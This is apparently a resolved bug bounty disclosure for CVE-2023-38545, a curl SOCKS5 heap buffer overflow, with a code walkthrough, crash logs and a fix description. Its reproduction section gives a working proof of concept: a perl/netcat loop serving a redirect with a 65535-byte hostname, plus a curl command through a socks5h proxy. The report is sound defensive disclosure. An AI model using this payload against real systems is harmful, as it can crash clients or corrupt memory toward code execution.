CVE-2023-38545: socks5 heap buffer overflow

High
C
curl
Reported by raysatiro

Vulnerability Details

Heap Overflow
# Summary:

The SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met:

1. The request is made via socks5h.
2. The state machine's negotiation buffer is smaller than ~65k.
3. The SOCKS server's "hello" reply is delayed.
4. The attacker sets a final destination hostname larger than the negotiation buffer.

libcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames longer than 255 but will not, due to a state machine bug.

For example, a Tor user runs a libcurl app with follow-location enabled, and it connects to a rogue onion server that replies with a payload in the `Location:` header, which causes a crash or worse.

# Walkthrough:

`do_SOCKS` initializes the local variable `socks5_resolve_local` depending on the `CURLPROXY_` name. There are two relevant names for this state machine:

- `CURLPROXY_SOCKS5` (SOCKS5 with local resolve of dest host)
- `CURLPROXY_SOCKS5_HOSTNAME` (SOCKS5 with remote resolve of dest host)

[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L573-L574)
~~~c
  bool socks5_resolve_local =
    (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;
~~~

For this scenario, `CURLPROXY_SOCKS5_HOSTNAME` is the name and `socks5_resolve_local` is initialized FALSE.

The `do_SOCKS` state machine is entered for the first time for the connection. `sx->state` is `CONNECT_SOCKS_INIT` (which happens to be the first label). In that state the hostname length is checked, and if it is too long to resolve remotely (>255) then `socks5_resolve_local` is set to TRUE.

[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L588-L593)
~~~c
    /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
    if(!socks5_resolve_local && hostname_len > 255) {
      infof(data, "SOCKS5: server resolving disabled for hostnames of "
            "length > 255 [actual len=%zu]", hostname_len);
      socks5_resolve_local = TRUE;
    }
~~~

The local variable `socks5_resolve_local` is changed but, because this is a state machine, subsequent calls to `do_SOCKS` are in a different state and do not make the same change. ==**This is the bug.**==

For this scenario, the hostname is longer than 255 characters and `do_SOCKS` is on a subsequent call, which means `socks5_resolve_local` has been re-initialized to FALSE. This can happen by chance or be forced by an attacker.

The client "hello" SOCKS packet contains the available methods and is sent to the server. State `CONNECT_SOCKS_READ_INIT` => `CONNECT_SOCKS_READ` is entered to parse the server "hello" packet (method selection reply). The server has not yet replied, so `do_SOCKS` returns `CURLPX_OK`.

[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L640-L662)
~~~c
CONNECT_SOCKS_READ_INIT:
  case CONNECT_SOCKS_READ_INIT:
    sx->outstanding = 2; /* expect two bytes */
    sx->outp = socksreq; /* store it here */
    /* FALLTHROUGH */
  case CONNECT_SOCKS_READ:
    presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
                               "initial SOCKS5 response");
    if(CURLPX_OK != presult)
      return presult;
    else if(sx->outstanding) {
      /* remain in reading state */
      return CURLPX_OK;
    }
    else if(socksreq[0] != 5) {
      failf(data, "Received invalid version in initial SOCKS5 response.");
      return CURLPX_BAD_VERSION;
    }
    else if(socksreq[1] == 0) {
      /* DONE! No authentication needed. Send request. */
      sxstate(sx, data, CONNECT_REQ_INIT);
      goto CONNECT_REQ_INIT;
    }
~~~

On a subsequent call `do_SOCKS` is in the same state, where it's waiting for the initial server reply.
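
The lost-update pattern described above can be reproduced in isolation. What follows is a minimal sketch, not libcurl code: `toy_state`, `toy_sx` and `toy_step` are hypothetical names, and the three states are a simplification of the real state machine. It only assumes what the walkthrough states, namely that the resolve flag is a local re-initialized on every call while the state persists between calls.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, simplified states; not libcurl's real enum. */
enum toy_state { TOY_INIT, TOY_READ, TOY_REQ };

struct toy_sx {
  enum toy_state state; /* persists across calls */
  bool hello_received;  /* caller sets this when the proxy reply arrives */
};

/* One call into the toy state machine. Returns true once the request stage
   is reached; *remote then says whether the name would go to the proxy. */
bool toy_step(struct toy_sx *sx, bool want_remote, size_t hostname_len,
              bool *remote)
{
  /* Re-initialized on EVERY call, like the local in do_SOCKS. */
  bool resolve_local = !want_remote;

  assert(sx && remote);

  switch(sx->state) {
  case TOY_INIT:
    if(!resolve_local && hostname_len > 255)
      resolve_local = true; /* only visible for the rest of this call */
    sx->state = TOY_READ;
    /* FALLTHROUGH */
  case TOY_READ:
    if(!sx->hello_received)
      return false;         /* reply pending: returning discards the local */
    sx->state = TOY_REQ;
    /* FALLTHROUGH */
  case TOY_REQ:
    *remote = !resolve_local;
    return true;
  }
  return false;
}
```

If the reply is already available on the first call, the 300-byte name falls back to local resolution. If the first call returns early and a second call finishes the job, the same name is sent for remote resolution because the override from the init state is gone.
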
If the reply is valid, and in this scenario it is, then the state machine will goto `CONNECT_REQ_INIT`, which will goto `CONNECT_RESOLVE_REMOTE` since `socks5_resolve_local` is FALSE.

[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L781-L797)
~~~c
CONNECT_REQ_INIT:
  case CONNECT_REQ_INIT:
    if(socks5_resolve_local) {
      enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port,
                                      TRUE, &dns);

      if(rc == CURLRESOLV_ERROR)
        return CURLPX_RESOLVE_HOST;

      if(rc == CURLRESOLV_PENDING) {
        sxstate(sx, data, CONNECT_RESOLVING);
        return CURLPX_OK;
      }
      sxstate(sx, data, CONNECT_RESOLVED);
      goto CONNECT_RESOLVED;
    }
    goto CONNECT_RESOLVE_REMOTE;
~~~

In `CONNECT_RESOLVE_REMOTE` the hostname is copied into the socksreq buffer. The code assumes the hostname is <= 255 characters, which as discussed above is not guaranteed.

[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L904-L911)
~~~c
      else {
        socksreq[len++] = 3;
        socksreq[len++] = (char) hostname_len; /* one byte address length */
        memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
        len += hostname_len;
      }
      infof(data, "SOCKS5 connect to %s:%d (remotely resolved)",
            sx->hostname, sx->remote_port);
~~~

`socksreq` points to the temporary download buffer (i.e. `data->state.buffer`), which was repurposed to send/receive the SOCKS negotiation since the transfer is not yet downloading.

If the size of the hostname exceeds the remaining size of the buffer then there is a buffer overflow. If the size of the hostname maxes out but does not exceed the remaining size then there is an overflow when the buffer is next written to.

Regardless, at this point we know from checks beforehand that the hostname length is at most 65535 (`MAX_URL_LEN`) and the full size of the buffer is at least `data->set.buffer_size + 1`.

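
To put numbers on the copy above, here is a small sketch of the size arithmetic. It assumes the RFC 1928 request layout (VER, CMD, RSV, ATYP, one length byte, the name, a 2-byte port) and that the request is written from the start of the buffer. The function names are hypothetical helpers for illustration, not libcurl functions.

```c
#include <assert.h>
#include <stddef.h>

/* Bytes occupied by a SOCKS5 request carrying a domain-name address:
   4 header bytes + 1 length byte + the name + 2 port bytes. */
size_t socks5_domain_request_len(size_t hostname_len)
{
  assert(hostname_len <= (size_t)-1 - 7); /* keep the sum from wrapping */
  return 4 + 1 + hostname_len + 2;
}

/* The length byte as it ends up in the packet after a one-byte cast. */
unsigned char socks5_len_byte(size_t hostname_len)
{
  return (unsigned char)hostname_len;
}

/* Bytes written past a buffer of buf_size bytes; 0 if the request fits. */
size_t socks5_overflow_bytes(size_t hostname_len, size_t buf_size)
{
  size_t need = socks5_domain_request_len(hostname_len);
  return need > buf_size ? need - buf_size : 0;
}
```

Under these assumptions a 65535-byte hostname needs 65542 bytes. That is 49157 bytes more than a 16384+1 byte buffer holds, while it fits in a 102400+1 byte buffer; both sizes are discussed later in this report. The one-byte cast also means a 300-byte name would be announced as 44 bytes in the packet even though all 300 bytes are copied.
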
[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/url.c#L1808-L1811)
~~~c
  else if(strlen(data->state.up.hostname) > MAX_URL_LEN) {
    failf(data, "Too long host name (maximum is %d)", MAX_URL_LEN);
    return CURLE_URL_MALFORMAT;
  }
~~~

[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/multi.c#L1858-L1861)
~~~c
CURLcode Curl_preconnect(struct Curl_easy *data)
{
  if(!data->state.buffer) {
    data->state.buffer = malloc(data->set.buffer_size + 1);
~~~

`data->set.buffer_size` varies. Before the allocation above, libcurl has set `data->set.buffer_size` to a default of 16384 (see `READBUFFER_SIZE` aka `CURL_MAX_WRITE_SIZE`), which could have been overridden by the user via `CURLOPT_BUFFERSIZE`. A significant example of this is the curl tool, which uses `CURLOPT_BUFFERSIZE` to set the size to its own default of 102400, or to the user setting from `--limit-rate` if that value is smaller than 100k.

The two buffer size configurations that are likely widely used are 16384+1 for libcurl apps without `CURLOPT_BUFFERSIZE` and 102400+1 for curl tool commands without a low `--limit-rate`. For the former the buffer can be overflowed and for the latter it can't: 16384+1 < 65535 < 102400+1.

The characters that are allowed in the hostname depend on whether libcurl was built with IDN support. If it was built with IDN support then as long as the hostname contains only characters < 0x80 no IDN conversion is attempted. For the higher value characters it seems very unlikely they would pass through, but that would depend on the IDN library. Without IDN support the characters pass through. For example `Location: http://\xff\r\n` will pass through without IDN.

[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/idn.c#L131-L144)
~~~c
bool Curl_is_ASCII_name(const char *hostname)
{
  /* get an UNSIGNED local version of the pointer */
  const unsigned char *ch = (const unsigned char *)hostname;

  if(!hostname) /* bad input, consider it ASCII! */
    return TRUE;

  while(*ch) {
    if(*ch++ & 0x80)
      return FALSE;
  }
  return TRUE;
}
~~~

[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/idn.c#L261-L265)
~~~c
#ifdef USE_IDN
  /* Check name for non-ASCII and convert hostname if we can */
  if(!Curl_is_ASCII_name(host->name)) {
    char *decoded;
    CURLcode result = idn_decode(host->name, &decoded);
~~~

# Steps To Reproduce:

The attacker needs to control the hostname. For example, the user has set `CURLOPT_FOLLOWLOCATION` (`--location` for the curl tool) so that libcurl will follow redirects. The attacker would need control of the hostname in the location header.

The attacker needs the state machine to be delayed, as discussed earlier. For example, the attacker controls the SOCKS server and delays the initial server hello.

The attacker probably needs to know how large `data->set.buffer_size` is and how the memory is typically allocated, like what comes after `data->state.buffer` in the heap. For example, the attacker has a copy of the program that is using libcurl and can debug it in a similar environment.

# Supporting Material/References:

~~~
Unhandled exception at 0x6e1557be (libcurld.dll) in curld.exe: 0xC0000005: Access violation reading location 0x41414141.
~~~

Refer to attached screenshot Capture.PNG.

~~~
HEAP[curld.exe]: Heap block at 005F8200 modified at 005FC22D past requested size of 4025
~~~

Note 4025 is in hex; in decimal it is 16421, which is 16384+1+heap guard bytes.

~~~
while true; do { perl -e 'print ("HTTP/1.1 301 Moved\r\nContent-Length: 0\r\nConnection: Close\r\nLocation: http://");print("A"x65535);print("\r\n\r\n")'; sleep 2; } | nc -4l [yourip] 8000; done
~~~

Start a socks5 server on remoteip (for the latency) and run curl repeatedly until it reads from 0x41414141 (AAAAA....)

~~~
curl -v --limit-rate 16384 --location --proxy socks5h://[remoteip]:1080 http://[yourip]:8000
~~~

If making the socks server remote doesn't work for latency, you'd have to modify its source or force the delay via the libcurl source:

~~~
   case CONNECT_SOCKS_READ:
+    {
+      static bool x = 0;
+      if(++x == 2)
+        return CURLPX_OK;
+    }
     presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
                                "initial SOCKS5 response");
~~~

# Solution

Refer to attached patch curl_security_fix.patch. It fixes the issue by changing the remote resolve check to return error `CURLPX_LONG_HOSTNAME` if the dest host is longer than 255.

# Impact

If the state machine is not delayed and works as intended then the resolution is made locally, which in my opinion is a privacy violation because a local DNS query could possibly deanonymize a user who specifically requests socks5h. In my solution patch I do not allow it.

If the state machine is delayed then the resolution is made remotely with a malformed SOCKS packet. The attacker has written to the heap and likely overwritten in-use data that comes after `data->state.buffer`. It's undefined behavior at best and *possible* RCE at worst. I think if libcurl was built with IDN support then the worst case is much harder to achieve because only certain bytes can be in the hostname.
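
The approach described under Solution, rejecting an over-long name at the point where it is encoded instead of relying on an earlier state, can be sketched as follows. This is an illustration only and not the attached patch: `toy_px`, `TOY_PX_LONG_HOSTNAME`, `TOY_PX_NO_SPACE` and `toy_encode_domain` are hypothetical stand-ins, and the capacity check is an extra assumption added for the sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical result codes standing in for libcurl's CURLPX_* values. */
enum toy_px { TOY_PX_OK, TOY_PX_LONG_HOSTNAME, TOY_PX_NO_SPACE };

/* Encode the domain-name address part (ATYP, length byte, name) into out.
   Nothing is written unless both checks pass. */
enum toy_px toy_encode_domain(unsigned char *out, size_t out_size,
                              const char *hostname, size_t *written)
{
  size_t hostname_len;

  assert(out && hostname && written);
  hostname_len = strlen(hostname);

  /* The length field is a single byte, so refuse anything above 255
     right here, on every call, rather than in an earlier state. */
  if(hostname_len > 255)
    return TOY_PX_LONG_HOSTNAME;

  /* Extra guard assumed for this sketch: never exceed the caller's buffer. */
  if(out_size < 2 + hostname_len)
    return TOY_PX_NO_SPACE;

  out[0] = 3;                           /* ATYP: domain name */
  out[1] = (unsigned char)hostname_len; /* one byte address length */
  memcpy(&out[2], hostname, hostname_len);
  *written = 2 + hostname_len;
  return TOY_PX_OK;
}
```

Because the check sits next to the copy, it does not depend on which earlier states ran during the current call, and no local DNS fallback happens for a socks5h request.
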

Report Details

State

Closed

Substate

Resolved

Weakness

Heap Overflow